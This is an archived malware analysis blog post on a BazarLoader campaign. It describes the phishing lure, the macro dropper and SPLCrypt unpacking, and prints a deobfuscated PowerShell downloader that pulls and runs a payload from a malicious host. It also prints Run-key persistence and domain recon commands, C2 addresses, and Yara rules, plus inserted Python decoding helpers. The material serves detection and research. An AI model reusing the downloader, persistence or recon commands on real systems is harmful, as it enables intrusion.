{
	"id": "1d2f46c5-bba3-4b85-9a0f-f1bdd4d6bc3a",
	"created_at": "2026-04-06T00:22:03.46156Z",
	"updated_at": "2026-04-10T03:22:13.88292Z",
	"deleted_at": null,
	"sha1_hash": "217f4616d960481d37a3497d97c4bda5a5bff598",
	"title": "BazarLoader – Back From Holiday Break – Malware Book Reports",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 184581,
	"plain_text": "BazarLoader – Back From Holiday Break – Malware Book Reports\r\nBy muzi View all posts\r\nArchived: 2026-04-05 19:18:02 UTC\r\nWe recently observed a Bazarloader campaign at $dayjob, kicking off the return of maldoc campaigns after the holidays.\r\nThis campaign piqued my interest after it hit on my SPLCrypt Yara rule that I wrote a while back, so I figured why not do a\r\nquick write-up and share that rule out. If there are any errors in this post, please feel free to reach out to me for corrections.\r\nI’m still learning!\r\nUpdate: I’d been meaning to come back and do a more thorough analysis of BazarLoader and finally got around to it.\r\nDuring that time, Eli Salem, a researcher that I follow and learn from, released a write up on BazarLoader. Though our\r\narticles share a lot of overlapping information (both articles are on samples from the same campaign), Eli goes into more\r\ndetail than I do in several areas and I highly recommend reading Eli’s article.\r\nEmail with Link to Maldoc\r\nThe emails in this campaign were themed around participating in an interview and being awarded with a cash incentive for\r\ndoing so. The emails requested that the user download a document with a password of 123 and answering the questions\r\ninside to participate. Below is a sample of the lure.\r\nHi \u003cRedacted\u003e,\r\nOur client is looking to speak with professionals in the manufacturing and food production industries who have management\r\nThey are aiming to better understand the needs of people who are responsible for managing the day to day ongoing complianc\r\nI found you on LinkedIn and I think you're a good fit for this study.\r\nAn incentive of $250 will be paid to each participant for a 15-minute web interview. 
A bonus of $150 is also available for\r\nKindly answer the questions attached by link below (pass 123) if you want to participate and as to your relevance in this\r\nhxxps://1drv[.]ms/u/s!AqBUxnmcQ_BtblNHfJc4D_sZAh4?e=o4ejxJ\r\nMaldoc with Macros\r\nFilename: ReadMe.doc\r\nMD5: dbd0bb79ea2465a02455edca624f9bc8\r\nSHA1: 96c58f2c78ae38302f8f20e9cb08837ea3149eeb\r\nSHA256: 2e367fcfc6583efad45bb8bbc97a77f30853d11322335d14d3d3d9ff4a79ea3c\r\nThe Word document has a simple lure requesting that the user click both “Enable Editing” and “Enable Content.” Once\r\nenabled, the malicious macro included in the document will kick off.\r\nFigure 1: Malicious Macro Runs on AutoOpen\r\nThe macros embedded in the document are made to look like code to process credit cards. Buried in the VBA, a folder is\r\ncreated and two files are created and written to using the VBA Print # statement.\r\nFigure 2: Folder Creation\r\nFigure 3: 2 Files Created and Written To (1.png, 2.png)\r\nThe two “png” files that are written are actually 32-bit and 64-bit DLL files that are then executed by the macro. 
The functionality\r\nof the two DLLs is identical: run a PowerShell script to download the next stage.\r\nDLL/Powershell Downloader\r\nFilename: 1.png\r\nMD5: 6dab9678f4ae6395b829ff53dace8432\r\nhttps://malwarebookreports.com/bazarloader-back-from-holiday-break/\r\nPage 1 of 13\n\nSHA1: fe7ee5ce4435fcc271ab976146e2e6d8f16fde78\r\nSHA256: 7076e5832b8c2a386e70de2612280f96b09062ec5402e18aee65fb46de9d50b4\r\nFilename: 2.png\r\nMD5: f31e276e3a50fdd8b800f649dcff19cf\r\nSHA1: f55b2b821d12eed29b02d73e519dfa6d12eee1a5\r\nSHA256: 9304089e076099451e8a7b8fe204986d6e762d939512f20877fc06ba69b4d42e\r\nThe DLLs written by the maldoc are simple downloaders that write a PowerShell script named errcheck.ps1 and execute it.\r\nThe DLLs are not packed and simply running strings reveals the majority of the functionality of the downloaders.\r\nFigure 4: Name of .ps1 Written and Executed\r\nFigure 5: Command Executed to Run PS1\r\nAfter running strings, a blob of base64 data can be found in the output. Once decoded, the contents of the malicious ps1 file\r\nare revealed.\r\nFilename: errcheck.ps1\r\nMD5: c352d68a4d6077a3a94c57aed16c139b\r\nSHA1: 107ba4ca7a9b1c102295e951a40bddfac0c5d28e\r\nSHA256: 9ca8609a1f3c9eeaa81205d7cad0a4747ffc358c07924ece6ed55ce21df2de33\r\nThe PowerShell downloader is fairly simple but contains a fair amount of junk code to distract analysts and make it slightly\r\nannoying to read. Below is a small snippet showing an example of the junk code.\r\nFigure 6: Start-Process Call Hidden Amongst Junk Code\r\nOnce the junk code is removed, it is quite clear what this code is trying to accomplish. 
It simply downloads the next stage\r\nDLL via BitsTransfer and executes it using Start-Process and rundll32.exe.\r\nStart-Sleep -s 5\r\n$source = \"hxxp://nasikbazar[.]com/ldllrndlleaw64[.]png\"\r\nStart-Sleep -s 1\r\n$source2 = \"hxxp://nasikbazar[.]com/ldllrndlleaw64[.]png\"\r\n$mpath = \"c:\\.intel\\.rem\\.lang\\licne.txt\"\r\nif (Test-Path -Path $mpath){\r\nStart-Sleep -s 6\r\n}else{\r\nImport-Module bitstransfer;Start-BitsTransfer $source $mpath\r\n}\r\nif (Test-Path -Path $mpath){\r\nStart-Sleep -s 2\r\n}else{\r\nImport-Module bitstransfer;Start-BitsTransfer $source2 $mpath\r\n}\r\nStart-Sleep -s 6\r\nStart-Process -FilePath \"c:\\windows\\system32\\rundll32.exe\" -ArgumentList \"c:\\.intel\\.rem\\.lang\\licne.txt, Ep\r\nBazarLoader is a small loader that is part of the Team9 malware family, developed by the same group behind Trickbot. The\r\nTeam9 malware family was identified publicly in late April 2020 and has seen significant advances in development ever\r\nsince.\r\nSPLCrypt\r\nThe Team9 developers have a few crypters of choice and often rotate which crypter is used to pack their malware for each\r\ncampaign. In this case, our BazarLoader sample was packed with SPLCrypt, a new crypter associated with BazarLoader.\r\nThere’s very little information surrounding this particular crypter online, outside of a Yara rule that James Quinn of Binary\r\nDefense wrote. This rule is not public, so I have created my own Yara rule for this crypter which may be found at the end of\r\nthis blog post.\r\nFilename: licne.txt\r\nMD5: 3e57f39950ee4368e0a15abea1133272\r\nSHA1: 7303d9dd5795a667a1aecf94dc252c8105aca95d\r\nSHA256: 62a7b273f763f92fd683d9248ae9ab7f5bc115b8c15e995291fdeb91d1aecc4b\r\nSPLCrypt consists of three key sections: RC4 Decryption, Decompression and Execution of the Payload. 
If following along in a debugger,\r\ndo not forget to set the new origin to the export “EproyAklw.”\r\nFigure 7: Set New Origin to EproyAklw\r\nRC4 Decryption\r\nSPLCrypt first RC4 decrypts the BazarLoader payload, which is stored across two separate sections that are concatenated before decryption.\r\nFigure 8: RC4 Decrypt Function Call\r\nFigure 9: RC4 KSA (Key Scheduling Algorithm)\r\nOnce the RC4 decryption of the ciphertext has finished, the decrypted data resembles a compressed MZ/PE header.\r\nFigure 10: Compressed MZ/PE Header\r\nDecompression\r\nAfter the ciphertext has been RC4 decrypted, the decrypted data is then passed to a function to perform decompression.\r\nFigure 11: Decompression Function Call\r\nOnce the decompression routine has completed, we’re left with the unpacked BazarLoader DLL.\r\nFigure 12: Unpacked BazarLoader DLL (Preceded by |SPL|, hence the name SPLCrypt)\r\nExecution of Payload\r\nNow that the payload has been decrypted and decompressed, SPLCrypt hands off to shellcode borrowed from Metasploit. This shellcode\r\nresolves the addresses of a few functions by hash at runtime, to be used to create a section of memory and reflectively load and\r\nexecute the unpacked payload.\r\nFigure 13: Shellcode Resolving Functions Related to Execution of the Unpacked Malware\r\nOnce the addresses of the necessary functions have been resolved, NtCreateSection is called to create a section of memory\r\nin preparation to reflectively load and execute the payload.\r\nFigure 14: NtCreateSection SECTION_ALL_ACCESS\r\nNext, the unpacked payload is copied into the newly mapped memory, which VirtualProtect then marks RWX (PAGE_EXECUTE_READWRITE, 0x40).\r\nFigure 15: Unpacked Payload Copied into Allocated Memory\r\nFigure 16: VirtualProtect Setting Newly Allocated Memory to RWX (40)\r\nFinally, execution is transferred to the unpacked BazarLoader.\r\nFigure 17: Transfer Execution to Unpacked BazarLoader\r\nBazarLoader\r\nBazarLoader acts as an entry/staging point into a target network. 
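Before moving on to the loader itself, a worked example for the hash-based resolver just described. This is an added example by the editor, not code from the original post or from SPLCrypt: Metasploit's block_api, which the shellcode borrows, hashes the uppercased UTF-16LE module name (walked for MaximumLength bytes, so the terminating wide null is included) and the ASCII export name plus its null, one ROR-13-then-ADD step per byte, and sums the two 32-bit results. That rotate is the shr 0x0D / shl 0x13 pair the SPLCrypt Yara rule later in the post keys on. The candidate API list is an assumption for illustration; the hash constants actually present in the sample are not reproduced on this page, so the lookup table is a labelling aid for Figure 13, not a statement about those values.

```python
def ror32(value, bits):
    # 32-bit rotate right, the ROR the shellcode implements with the
    # shr 0x0D / shl 0x13 pair matched by the SPLCrypt Yara rule.
    value &= 0xFFFFFFFF
    return ((value >> bits) | (value << (32 - bits))) & 0xFFFFFFFF


def ror13_hash(data):
    # One ror-then-add step per input byte: what block_api does with
    # lodsb / ror edi,13 / add edi,eax (edi truncates to 32 bits).
    h = 0
    for b in data:
        h = (ror32(h, 13) + b) & 0xFFFFFFFF
    return h


def module_hash(module_name):
    # block_api walks BaseDllName as UTF-16LE for MaximumLength bytes, so
    # the terminating wide null is hashed too, and uppercases a-z as it goes.
    wide = (module_name.upper() + chr(0)).encode('utf-16le')
    return ror13_hash(wide)


def export_hash(export_name):
    # Export names are hashed as ASCII including the terminating null.
    return ror13_hash(export_name.encode('ascii') + bytes(1))


def api_hash(module_name, export_name):
    # The two partial hashes are summed modulo 2**32 (add edi, [ebp-8]).
    return (module_hash(module_name) + export_hash(export_name)) & 0xFFFFFFFF


def build_lookup(pairs):
    # hash -> module!export, for labelling constants found in the resolver.
    return {api_hash(m, e): m + '!' + e for m, e in pairs}


# Assumed candidate list for this example. The page names NtCreateSection
# and VirtualProtect as calls the resolved pointers are used for; the rest
# are typical reflective-loader imports, not values read from the sample.
CANDIDATES = [
    ('kernel32.dll', 'LoadLibraryA'),
    ('kernel32.dll', 'GetProcAddress'),
    ('kernel32.dll', 'VirtualAlloc'),
    ('kernel32.dll', 'VirtualProtect'),
    ('kernel32.dll', 'WinExec'),
    ('ntdll.dll', 'NtCreateSection'),
    ('ntdll.dll', 'NtMapViewOfSection'),
]

if __name__ == '__main__':
    for h, name in sorted(build_lookup(CANDIDATES).items()):
        print('0x%08x  %s' % (h, name))
```

Two of the values it produces, 0x0726774c for kernel32.dll!LoadLibraryA and 0x876f8b31 for kernel32.dll!WinExec, are the constants that appear in stock Metasploit payloads, which is a quick check that the byte walk matches the assembly. A crypter that keeps the resolver but changes the rotate count or seeds the hash will not match this table, so those two parameters are the first thing to confirm against the disassembly in Figure 13.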
BazarLoader is usually quickly followed up by\r\nBazarBackdoor, Cobalt Strike and then Ryuk Ransomware. The graphic below from Bleeping Computer shows this cycle.\r\nFigure 18: Typical Bazar Infection\r\nBAZARLOADER EXECUTION\r\nBazarLoader uses dynamic API hashing to resolve APIs used within the malware. This technique makes static analysis\r\nslightly more difficult in that it resolves Windows API calls at runtime rather than listing them in the import table. BazarLoader\r\nmakes use of the same hashing routine as Carberp. Typically, shortly after resolving a pointer to the desired API,\r\nBazarLoader calls the function.\r\nFigure 19: BazarLoader uses the same dynamic API hashing routine as seen in Carberp\r\nWhen BazarLoader is executed, it runs several commands similar to:\r\ncmd /c choice /n /c y /d y /t 9 \u0026 \"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Users\\Admin\\AppData\\Local\\Temp\\dumped_bazar.bin\r\nFigure 20: Terminate Current Process and Start BazarLoader Again\r\nThis command ends the currently running process and starts BazarLoader again, this time with different arguments; the choice /t 9 call is only a nine-second delay before the restart. Next,\r\nBazarLoader adds persistence in the form of a Run key under HKCU.\r\ncmd.exe /c reg.exe add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /f /v Fv1ti2wN5mS4nG4tQ3U /t REG_SZ /d \"\\\"C:\\W\r\nFigure 21: BazarLoader Persistence via RunKey\r\nFigure 22: BazarLoader Persistence\r\nOnce persistence has been established, BazarLoader searches for an injection target. 
BazarLoader targets svchost.exe,\r\ncmd.exe and explorer.exe, as well as IEXPLORE, MSEdge and Chrome.\r\nFigure 23: Querying for Installed Apps\r\nFigure 24: Chrome Identified\r\nFigure 25: Chrome.exe Injection Target\r\nOnce a target has been identified, BazarLoader will execute this process in a suspended state, hollow it out and inject itself\r\ninto it.\r\nFigure 26: CreateProcess in Suspended State\r\nFigure 27: Chrome Started in Suspended State\r\nFigure 28: Inject Malicious Code into Chrome\r\nFinally, once injected, execution is transferred with ResumeThread.\r\nFigure 29: Resume Thread to Transfer Execution to Malicious Code Injected into Chrome\r\nAfter injecting itself into a hollowed-out process, BazarLoader sleeps for a short period. Next, it begins performing some\r\nconnectivity checks to the following:\r\nyahoo.com\r\ngoogle.com\r\namazon.com\r\nmicrosoft.com\r\nmsdn.microsoft.com\r\nlive.com\r\neset.com\r\nfortinet.com\r\nsky.com\r\nintel.com\r\nhp.com\r\nhpe.com\r\napple.com\r\nvanguard.com\r\nwhitehouse.gov\r\nFigure 30: Example of Domain Used for Connectivity Checks\r\nThe domains above, the C2s below and many additional strings are decrypted by BazarLoader during runtime using routines\r\nsimilar to the following. 
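Figure 31, referenced just below, is an image and is not reproduced in this text, but the two Ghidra listings quoted as comments in the BazarLoader Yara rule later in the post show the shape of the routine: a few 32-bit immediates are written to the stack, a flag byte is tested, and a loop XORs each dword with a 32-bit key that is either an immediate (xor eax, 0x59fb99a9) or held in edx (mov edx, 0x1a705fe7 ... xor eax, edx), the result being read back as little-endian bytes. The Python below is an added example by the editor, not the author's decryptor: it re-assembles those listing bytes (constructed input, copied from the listings), finds each run of immediate stores, recovers the key with a small byte-pattern heuristic written for exactly these two shapes, and decrypts. The first listing decodes to reddew28c.bazar, one of the hardcoded C2 domains listed below; the second decodes to svchost.exe followed by a space, and in that variant the key itself is stored as the final dword (89 55 88), which XORs to the null terminator.

```python
import struct

# Constructed input: the two Ghidra listings quoted in the BazarLoader Yara
# rule below, re-assembled byte for byte.
# Variant 1: four immediate dword stores, then xor eax, imm32 (opcode 35).
LISTING_XOR_IMM = bytes.fromhex(
    'c7450bdbfc9f3d' 'c7450fcceec961' 'c74513cab79938' 'c74517d3f88959'
    '8b450b' '8a4507' '84c0' '7519' '488bcb' '8b448d0b' '35a999fb59'
)
# Variant 2: mov edx, imm32 (opcode BA) carries the key, three immediate
# dword stores follow, the key is stored once more as the terminator
# (89 55 88 = mov [rbp-0x78], edx) and the loop uses xor eax, edx (33 C2).
LISTING_XOR_REG = bytes.fromhex(
    '40887c2478' 'bae75f701a' 'c744247c94291372' 'c74580882c0434'
    'c745848227153a' '895588' '8b44247c' '8a442478' '84c0' '7516'
    '488bcf' '8b448c7c' '33c2'
)


def _store_len(code, i):
    # Length of mov dword [rbp+disp8], imm32 (C7 45 disp8 imm32) or
    # mov dword [rsp+disp8], imm32 (C7 44 24 disp8 imm32) at offset i, else 0.
    if code[i:i + 2] == bytes.fromhex('c745'):
        return 7
    if code[i:i + 3] == bytes.fromhex('c74424'):
        return 8
    return 0


def find_store_runs(code, min_stores=2):
    # Yield (start, end, dwords) for every run of back-to-back immediate
    # stores; the dwords are kept in store order, which is memory order here.
    i = 0
    while i < len(code):
        n = _store_len(code, i)
        if not n:
            i += 1
            continue
        start, dwords = i, []
        while n:
            dwords.append(struct.unpack_from('<I', code, i + n - 4)[0])
            i += n
            n = _store_len(code, i) if i < len(code) else 0
        if len(dwords) >= min_stores:
            yield start, i, dwords


def find_key(code, start, end, window=48):
    # Heuristic, written for the two shapes in the listings:
    # variant 1 has xor eax, imm32 (35 imm32) shortly after the stores;
    # variant 2 has mov edx, imm32 (BA imm32) just before them and
    # xor eax, edx (33 C2) after them. A stray 0x35 byte would mislead it.
    tail = code[end:end + window]
    j = tail.find(0x35)
    if j != -1 and len(tail) >= j + 5:
        return struct.unpack_from('<I', tail, j + 1)[0]
    head = code[max(0, start - 16):start]
    j = head.rfind(0xBA)
    if j != -1 and len(head) >= j + 5 and bytes.fromhex('33c2') in tail:
        return struct.unpack_from('<I', head, j + 1)[0]
    return None


def decrypt_stack_strings(code):
    # Returns [(key, plaintext)] for every run whose key could be recovered.
    # Each dword is XORed with the key and emitted little-endian; output is
    # cut at the first null if one is present.
    out = []
    for start, end, dwords in find_store_runs(code):
        key = find_key(code, start, end)
        if key is None:
            continue
        plain = b''.join(struct.pack('<I', d ^ key) for d in dwords)
        nul = plain.find(0)
        out.append((key, plain if nul == -1 else plain[:nul]))
    return out


if __name__ == '__main__':
    for key, text in decrypt_stack_strings(LISTING_XOR_IMM + LISTING_XOR_REG):
        print('0x%08x  %r' % (key, text))
```

The 0x35 search is the weak point: that opcode byte can occur inside an unrelated instruction, so when running this over a whole .text section keep the window small and sanity-check by looking for printable output. The same fixed loop structure is what makes the routine a good Yara anchor, as the author notes.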
Note: Similar routines are used to decrypt strings throughout BazarLoader, making it a prime target\r\nfor a Yara rule.\r\nFigure 31: String Decryption Routine\r\nOnce connectivity has been verified, BazarLoader will attempt to resolve the following hardcoded C2s.\r\n185[.]99[.]133[.]67\r\n188[.]127[.]249[.]22\r\n5[.]255[.]103[.]36\r\n91[.]201[.]202[.]138\r\nreddew28c[.]bazar\r\nbluehail[.]bazar\r\nwhitestorm9p[.]bazar\r\nFigure 32: Bazar Domains in BazarLoader Sample\r\nIf those fail, BazarLoader falls back to DGA-generated Emercoin (.bazar) domains.\r\nFigure 33: Bazar DGA Algorithm\r\nBazarLoader Available Commands\r\nBazarLoader serves as an entry point into a network. It supports several options to help profile the infected host, fetch and\r\nexecute commands, return command output to the server and finally download and execute BazarBackdoor.\r\nFigure 34: BazarLoader Command Options (Except Download and Run Backdoor)\r\nSend Telemetry\r\nThis command sends basic information about the infected host machine to the server.\r\nFigure 35: Send Telemetry Command\r\nGet Command From Server\r\nGet Command From Server does exactly what it says it does – it fetches commands from the C2 server and executes them.\r\nHere are some examples of commands sent from the C2 server:\r\nnet group “domain admins” /dom\r\nnet localgroup “administrator”\r\nnltest /domain_trusts /all_trusts\r\nnet group “Domain Computers” /domain\r\nnet view /all\r\npowershell -executionpolicy bypass -command “try { Get-WmiObject -Namespace ‘root\\SecurityCenter2’ -Query\r\n‘SELECT displayName, pathToSignedProductExe FROM AntiVirusProduct’ -ErrorAction Stop } catch { Write-Host\r\n” -NoNewline }”\r\npowershell -executionpolicy bypass -command “$path=’windowsdefender://’; if ($path -eq $null) { Write-Host ‘0’ }\r\nelse { if (Test-Path ($path)) { write-host\r\n([System.Diagnostics.FileVersionInfo]::GetVersionInfo($path).ProductVersion) } else 
{ Write-Host ‘0’ } }”\r\npowershell -executionpolicy bypass -command\r\n“$Servers=@(‘http://checkip.amazonaws.com’,’https://ipinfo.io/ip’,’http://api.ipify.org’,’https://myexternalip.com/raw’,’http://wtfismyip.com/text\r\nformat=text’,’http://api.ip.sb/ip’,’http://ident.me/ip’);$i=Get-Random -Minimum 0 -Maximum 8; \u003c#Write-Host\r\nHTTP-DNS request via $Servers[$i];#\u003etry { $ip=Invoke-WebRequest -UseBasicParsing -Uri $Servers[$i]; Write-Host $ip.content -NoNewline; }catch { \u003c#Write-Error $_.Exception.Message;#\u003e Write-Host ” -NoNewline; }”\r\npowershell -command “foreach ($p in (Get-WmiObject -Class Win32_Processor)) {Write-Host $p.Name}”\r\npowershell -command “foreach ($p in (Get-WmiObject -Class Win32_DiskDrive)) {Write-Host ([string]int+’GB,\r\n‘+$p.Caption);}”\r\npowershell -command “(Get-WmiObject -Class ‘Win32_BaseBoard’).Manufacturer”\r\npowershell -command “((Get-WmiObject -Class\r\nWin32_ComputerSystem).TotalPhysicalMemory/1mb).tostring(‘F00’)”\r\nFigure 36: Get Command From Server Command\r\nSend Answer to Server\r\nThe Send Answer to Server command simply sends the output of the command executed from “Get Command From\r\nServer.”\r\nDownload and Run Backdoor\r\nThis command attempts to download and run the BazarBackdoor for additional post-exploitation activity. Based on previous\r\nConti activity, this typically leads to Cobalt Strike and eventually ransomware.\r\nFigure 37: BazarLoader Command to Download and Run BazarBackdoor\r\nSPLCrypt Yara Rule\r\nAs always, please test this rule in your environment before using it. I’m not responsible for causing tons of alerts or breaking\r\nyour tools/environment, due to inefficiency (which this rule is), False Positives, etc.! Again, special thanks to James Quinn\r\nof Binary Defense for providing the rule to abuse.ch and for encouraging me to write this rule. 
Additional Yara rules I’ve written\r\nand included in my other blog posts can be found here.\r\nrule SPLCrypt {\r\n meta:\r\n author = \"muzi\"\r\n description = \"Identifies SPLCrypt, a crypter associated with Bazar.\"\r\n date = \"01/16/22\"\r\n strings:\r\n // Implementation of ROR(x, 0x0D)\r\n // (x \u003c\u003c 0x13|x \u003e\u003e 0x0D) == ROR(x,0x0D)\r\n /*\r\n 00007FFADADC4E37 | 8B0424 | mov eax,dword ptr ss:[rsp] | hash\r\n00007FFADADC4E3A | C1E8 0D | shr eax,D |\r\n00007FFADADC4E3D | 66:3BFF | cmp di,di |\r\n00007FFADADC4E40 | 74 4C | je splcrypt_bazar.7FFADADC4E8E |\r\n*/\r\n $match_1_shr = {\r\n (8B|8D) ?? 24 [0-8] // mov \u003creg\u003e, dword ptr ss:[rsp] hash\r\n C1 (E8|E9|EA|EB|ED|EE|EF) 0D [0-16] // shr \u003creg\u003e, D\r\n (E2|EB|72|74|75|7C) ?? // loop (E2), short jmp (EB) or jb/je/jne/jl (72/74/75/7C)\r\n }\r\n /*\r\n 00007FFADADC4E85 | 48:634424 04 | movsxd rax,dword ptr ss:[rsp+4] | i\r\n00007FFADADC4E8A | 3AFF | cmp bh,bh |\r\n00007FFADADC4E8C | 74 DE | je splcrypt_bazar.7FFADADC4E6C |\r\n00007FFADADC4E8E | 8B0C24 | mov ecx,dword ptr ss:[rsp] |\r\n00007FFADADC4E91 | C1E1 13 | shl ecx,13 |\r\n00007FFADADC4E94 | E9 44FFFFFF | jmp splcrypt_bazar.7FFADADC4DDD\r\n*/\r\n $match_2_shl_13 = {\r\n (8B|8D) ?? 24 [0-8]\r\n C1 (E0|E1|E2|E3|E5|E6|E7) 13\r\n }\r\n condition:\r\n #match_1_shr \u003e 1 and #match_2_shl_13 \u003e 1 and\r\n // string match offsets are 1-based, so the loop starts at 1\r\n for any i in (1..#match_1_shr):\r\n ($match_2_shl_13 in (@match_1_shr[i]..@match_1_shr[i]+200))\r\n}\r\nSPLCrypt Unpacker\r\nI wrote a small unpacker utilizing Speakeasy from Mandiant to dump out the decrypted/decompressed BazarLoader sample.\r\nI originally intended to do it without emulation, but was unable to determine which type of compression was being used.\r\nBazarLoader Yara Rule\r\nI haven’t tested this rule in a production environment, so just as I said with the rule above, use at your own risk. 
It’s also a\r\nbit non-performant.\r\nrule BazarLoader {\r\n meta:\r\n author = \"muzi\"\r\n description = \"Identifies BazarLoader.\"\r\n date = \"02/18/22\"\r\n strings:\r\n /*\r\n 18000de19 c7 45 0b MOV dword ptr [RBP + local_54 ],0x3d9ffcdb\r\n db fc 9f\r\n 3d\r\n 18000de20 c7 45 0f MOV dword ptr [RBP + local_50 ],0x61c9eecc\r\n cc ee c9\r\n 61\r\n 18000de27 c7 45 13 MOV dword ptr [RBP + local_4c ],0x3899b7ca\r\n ca b7 99\r\n 38\r\n 18000de2e c7 45 17 MOV dword ptr [RBP + local_48 ],0x5989f8d3\r\n d3 f8 89\r\n 59\r\n 18000de35 8b 45 0b MOV EAX ,dword ptr [RBP + local_54 ]\r\n 18000de38 8a 45 07 MOV AL ,byte ptr [RBP + local_58 ]\r\n 18000de3b 84 c0 TEST AL ,AL\r\n 18000de3d 75 19 JNZ LAB_18000de58\r\n 18000de3f 48 8b cb MOV param_1 ,RBX\r\n LAB_18000de42 XREF[1]: 18000de56 (j)\r\n 18000de42 8b 44 8d MOV EAX ,dword ptr [RBP + param_1 *0x4 + local_50 ]\r\n 0b\r\n 18000de46 35 a9 99 XOR EAX ,0x59fb99a9\r\n fb 59\r\n*/\r\n $xor_hash = {\r\n C7 4? [2-4] ?? ?? ?? ??\r\n C7 4? [2-4] ?? ?? ?? ?? 
[10-30]\r\n 35\r\n }\r\n /*\r\n LAB_180012316 XREF[1]: 1800122ca (j)\r\n 180012316 40 88 7c MOV byte ptr [RSP + local_1d0 ],DIL\r\n 24 78\r\n 18001231b ba e7 5f MOV param_2 ,0x1a705fe7\r\n 70 1a\r\n 180012320 c7 44 24 MOV dword ptr [RSP + local_1cc ],0x72132994\r\n 7c 94 29\r\n 13 72\r\n 180012328 c7 45 80 MOV dword ptr [RBP + local_1c8 ],0x34042c88\r\n 88 2c 04\r\n 34\r\n 18001232f c7 45 84 MOV dword ptr [RBP + local_1c4 ],0x3a152782\r\n 82 27 15\r\n 3a\r\n 180012336 89 55 88 MOV dword ptr [RBP + local_1c0 ],param_2\r\n 180012339 8b 44 24 MOV EAX ,dword ptr [RSP + local_1cc ]\r\n 7c\r\n 18001233d 8a 44 24 MOV AL ,byte ptr [RSP + local_1d0 ]\r\n 78\r\n 180012341 84 c0 TEST AL ,AL\r\n 180012343 75 16 JNZ LAB_18001235b\r\n 180012345 48 8b cf MOV param_1 ,RDI\r\n LAB_180012348 XREF[1]: 180012359 (j)\r\n 180012348 8b 44 8c MOV EAX ,dword ptr [RSP + param_1 *0x4 + local_1c8 ]\r\n 7c\r\n 18001234c 33 c2 XOR EAX ,param_2\r\n */\r\n \r\n $xor_reg = {\r\n BA ?? ?? ?? ??\r\n C7 4? [2-4] ?? ?? ?? ??\r\n C7 4? [2-4] ?? ?? ?? ?? [10-30]\r\n 33 C2\r\n }\r\n condition:\r\n uint16be(0) == 0x4D5A and\r\n #xor_hash \u003e 5 and\r\n #xor_reg \u003e 5\r\n}\r\nBazarLoader String Decryptor\r\nI wanted to write a string decryptor for BazarLoader since doing it manually is a bit of a pain. 
Originally I was using Yara to\r\nextract the instruction sequences, but using a pure Python implementation was more effective and easier.\r\nExample output from the Python decryptor:\r\nGetFullPathNameA\r\nt write data\r\nCryptdll.dll\r\nrundll32.exe\r\nGetFileAttributesExA\r\ncmd.exe /c reg.exe add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /f /v\r\nkernel32.dll\r\nbytearray(b'#`8)\\x7f\\x11.n+\\x12Y\\xbc\\xc4N_\\xb7')\r\nbytearray(b\"\\x9b\\'J\\xc6Q\\xb4f\\x98\\xa6\\xd3\\x10V\\xdd\\xc7\\x1ez\")\r\nbytearray(b'm\\x1d\\xd9R\\x8dU\\xe30G\\t\\x82\\x0cX\\x80/\\x88')\r\nbytearray(b'\\xbdl\\xc5^\\x1b\\xc06\u0026\\x9dC\\xcf\\xb3v[\\xb6-')\r\nbytearray(b'\\xd7\\xe04\u003e}d\\xe1\\x86\\x0f\\xbf\\xa8\\x08\\xdc\\x182P')\r\nbytearray(b'\\x1c\\xd6\\x8fK \\r\\x85I\\x15cx\\xa3\\xc1\\x19\\xb9\\x16')\r\nbytearray(b'\\xc3B\\xa2W\\x81Fi\\xa1\\x9eT\\x14\\xaf\\xd4\\xcd!t')\r\nbytearray(b'3\\xc2\\x02\\x8a;\u003c\\x937uO\\xa9\\xad\\x05\\xde\\xae\\xe2')\r\nbytearray(b'\\x90k\\xb5\\xbeML\\xdb\\xa5\\xd2\\\\$\\x06?(s\\x1f')\r\nbytearray(b'\\x9a\\x91\\x89p@Zq\\xc9\\xd8a\\x95H\\xaboS\\x84')\r\nbytearray(b'\\x96|1\\x9c\\xc8\\x0b5\\x13A\\x9f\\xb89\\xceE{b')\r\nbytearray(b'\\x1a\\xac\\x8b\\x0e\\x17\\x94\"\\xa7,\\xd0e\\x97')\r\nBCryptFreeBuffer\r\nBCryptAddContextFunction\r\nTLS_ECDHE_ECDSA_\r\nTLS_RSA_WITH_AES_256_CBC_SHA\r\nTLS_RSA_WITH_AES_128_CBC_SHA\r\nadvapi32.dll\r\nl3dGr_uWs_p9m55s\r\n5.255.103.36\r\nregsvr32.exe\r\nsvchost.exe\r\nsvchost.exe\r\nkernel32.dll\r\nfortinet.com\r\nvanguard.com\r\nkernel32.dll\r\nkernel32.dll\r\nBCryptCreateHash\r\nBCryptFinishHash\r\nMIIEnwIBAAKCAQCs/Imfp7Sjqp2YPvDxQ+L5fKPfde3SazTkKYFzaVK72T5QNRitAU8yYoNj0rWkjDDs4cjn8dP8wzA0/CK+AqE09ZcNJXP1z6b+/b0oZhVMIw\r\nC1k2Lgooc0NeLiM7ZFFbj4v2x9SPkZCel0h/DhBJXeX8qJLdPDtdxNCTM6CPaxZwqZS0NI61DS4+9e2rX2Vy\r\n29OqoXtBN9fKFYHw+r4fedEDJxNa42r3E9vZpq457r9jteM=\r\nhardcoded IP\r\nUndefined\r\nBitDefender\r\nNortonSecurity\r\nWindowsDefender\r\n]. 
